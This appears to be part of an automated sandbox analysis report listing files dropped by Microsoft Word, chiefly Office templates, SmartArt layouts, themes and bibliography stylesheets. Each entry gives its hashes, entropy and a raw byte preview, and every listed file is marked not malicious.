                                                                                                                                                                                                                                                                Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4026
                                                                                                                                                                                                                                                                Entropy (8bit):7.809492693601857
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                                                                                                                                                                                                                                                MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                                                                                                                                                                                                                                SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                                                                                                                                                                                                                                SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                                                                                                                                                                                                                                SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):250
                                                                                                                                                                                                                                                                Entropy (8bit):3.4916022431157345
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUXsAl8xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8A8xoGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                MD5:1A314B08BB9194A41E3794EF54017811
                                                                                                                                                                                                                                                                SHA1:D1E70DB69CA737101524C75E634BB72F969464FF
                                                                                                                                                                                                                                                                SHA-256:9025DD691FCAD181D5FD5952C7AA3728CD8A2CAF20DEA14930876419BED9B379
                                                                                                                                                                                                                                                                SHA-512:AB29C8674A85711EABAE5F9559E9048FE91A2F51EB12D5A46152A310DE59F759DF8C617DA248798A7C20F60E26FBB1B0FC8DB47C46B098BCD26CF8CE78989ACA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.r.a.c.k.e.t.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):374
                                                                                                                                                                                                                                                                Entropy (8bit):3.5414485333689694
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUX8FaE3f8AWqlQqr++lcWimqnKOE3QepmlJ0+3FbnKfZObdADryMluxHZypo:fxnyj9AWI+acgq9GHmD0wbnKYZAH/lMf
                                                                                                                                                                                                                                                                MD5:2F7A8FE4E5046175500AFFA228F99576
                                                                                                                                                                                                                                                                SHA1:8A3DE74981D7917E6CE1198A3C8E35C7E2100F43
                                                                                                                                                                                                                                                                SHA-256:1495B4EC56B371148EA195D790562E5621FDBF163CDD8A5F3C119F8CA3BD2363
                                                                                                                                                                                                                                                                SHA-512:4B8FBB692D91D88B584E46C2F01BDE0C05DCD5D2FF073D83331586FB3D201EACD777D48DB3751E534E22115AA1C3C30392D0D642B3122F21EF10E3EE6EA3BE82
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.e.x.t. .S.i.d.e.b.a.r. .(.A.n.n.u.a.l. .R.e.p.o.r.t. .R.e.d. .a.n.d. .B.l.a.c.k. .d.e.s.i.g.n.)...d.o.c.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):47296
                                                                                                                                                                                                                                                                Entropy (8bit):6.42327948041841
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                                                                                                                                                                                                                                                MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                                                                                                                                                                                                                                                SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                                                                                                                                                                                                                                                SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                                                                                                                                                                                                                                                SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):246
                                                                                                                                                                                                                                                                Entropy (8bit):3.5039994158393686
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUX4f+E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                MD5:16711B951E1130126E240A6E4CC2E382
                                                                                                                                                                                                                                                                SHA1:8095AA79AEE029FD06428244CA2A6F28408448DB
                                                                                                                                                                                                                                                                SHA-256:855342FE16234F72DA0C2765455B69CF412948CFBE70DE5F6D75A20ACDE29AE9
                                                                                                                                                                                                                                                                SHA-512:454EAA0FD669489583C317699BE1CE5D706C31058B08CF2731A7621FDEFB6609C2F648E02A7A4B2B3A3DFA8406A696D1A6FA5063DDA684BDA4450A2E9FEFB0EF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.b.e.d.A.r.c...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3683
                                                                                                                                                                                                                                                                Entropy (8bit):7.772039166640107
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                                                                                                                                                                                                                                                MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                                                                                                                                                                                                                                SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                                                                                                                                                                                                                                SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                                                                                                                                                                                                                                                SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):278
                                                                                                                                                                                                                                                                Entropy (8bit):3.5280239200222887
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUXQAl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyllNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                                                                                                                                MD5:877A8A960B2140E3A0A2752550959DB9
                                                                                                                                                                                                                                                                SHA1:FBEC17B332CBC42F2F16A1A08767623C7955DF48
                                                                                                                                                                                                                                                                SHA-256:FE07084A41CF7DB58B06D2C0D11BCACB603D6574261D1E7EBADCFF85F39AFB47
                                                                                                                                                                                                                                                                SHA-512:B8B660374EC6504B3B5FCC7DAC63AF30A0C9D24306C36B33B33B23186EC96AEFE958A3851FF3BC57FBA72A1334F633A19C0B8D253BB79AA5E5AFE4A247105889
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.b...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):268317
                                                                                                                                                                                                                                                                Entropy (8bit):5.05419861997223
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                                                                                                                                                                                                                                                MD5:51D32EE5BC7AB811041F799652D26E04
                                                                                                                                                                                                                                                                SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                                                                                                                                                                                                                                                SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                                                                                                                                                                                                                                                SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):333258
                                                                                                                                                                                                                                                                Entropy (8bit):4.654450340871081
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                                                                                                                                                                                                                                                MD5:5632C4A81D2193986ACD29EADF1A2177
                                                                                                                                                                                                                                                                SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                                                                                                                                                                                                                                                SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                                                                                                                                                                                                                                                SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):328
                                                                                                                                                                                                                                                                Entropy (8bit):3.541819892045459
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUXuqRDA5McaQVTi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxny+AASZQoNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                                                                                                                                MD5:C3216C3FC73A4B3FFFE7ED67153AB7B5
                                                                                                                                                                                                                                                                SHA1:F20E4D33BABE978BE6A6925964C57D6E6EF1A92E
                                                                                                                                                                                                                                                                SHA-256:7CF1D6A4F0BE5E6184F59BFB1304509F38E480B59A3B091DBDC43B052D2137CB
                                                                                                                                                                                                                                                                SHA-512:D3B78BE6E7633FF943F5E34063B5EFA4AF239CD49F437227FC7575F6CC65C497B7D6F6A979EA065065BEAF257CB368560B5462542692286052B5C7E5C01755BC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .A.P.A.S.i.x.t.h.E.d.i.t.i.o.n.O.f.f.i.c.e.O.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):966946
                                                                                                                                                                                                                                                                Entropy (8bit):7.8785200658952
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                                                                                                                                                                                                                                                MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                                                                                                                                                                                                                                SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                                                                                                                                                                                                                                SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                                                                                                                                                                                                                                SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):282
                                                                                                                                                                                                                                                                Entropy (8bit):3.5323495192404475
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Q+sxnxUXhduDARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyxdumymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                MD5:BD6B5A98CA4E6C5DBA57C5AD167EDD00
                                                                                                                                                                                                                                                                SHA1:CCFF7F635B31D12707DC0AC6D1191AB5C4760107
                                                                                                                                                                                                                                                                SHA-256:F22248FE60A55B6C7C1EB31908FAB7726813090DE887316791605714E6E3CEF7
                                                                                                                                                                                                                                                                SHA-512:A178299461015970AF23BA3D10E43FCA5A6FB23262B0DD0C5DDE01D338B4959F222FD2DC2CC5E3815A69FDDCC3B6B4CB8EE6EC0883CE46093C6A59FF2B042BC1
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .Q.u.o.t.a.b.l.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):486596
                                                                                                                                                                                                                                                                Entropy (8bit):7.668294441507828
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                                                                                                                                                                                                                                                MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                                                                                                                                                                                                                                SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                                                                                                                                                                                                                                SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                                                                                                                                                                                                                                SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):274
                                                                                                                                                                                                                                                                Entropy (8bit):3.535303979138867
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Q+sxnxUX3IlVARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnynG6ymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                MD5:35AFE8D8724F3E19EB08274906926A0B
                                                                                                                                                                                                                                                                SHA1:435B528AAF746428A01F375226C5A6A04099DF75
                                                                                                                                                                                                                                                                SHA-256:97B8B2E246E4DAB15E494D2FB5F8BE3E6361A76C8B406C77902CE4DFF7AC1A35
                                                                                                                                                                                                                                                                SHA-512:ACF4F124207974CFC46A6F4EA028A38D11B5AF40E55809E5B0F6F5DABA7F6FC994D286026FAC19A0B4E2311D5E9B16B8154F8566ED786E5EF7CDBA8128FD62AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.i.e.w...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):976001
                                                                                                                                                                                                                                                                Entropy (8bit):7.791956689344336
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                                                                                                                                                                                                                                                MD5:9E563D44C28B9632A7CF4BD046161994
                                                                                                                                                                                                                                                                SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                                                                                                                                                                                                                                SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
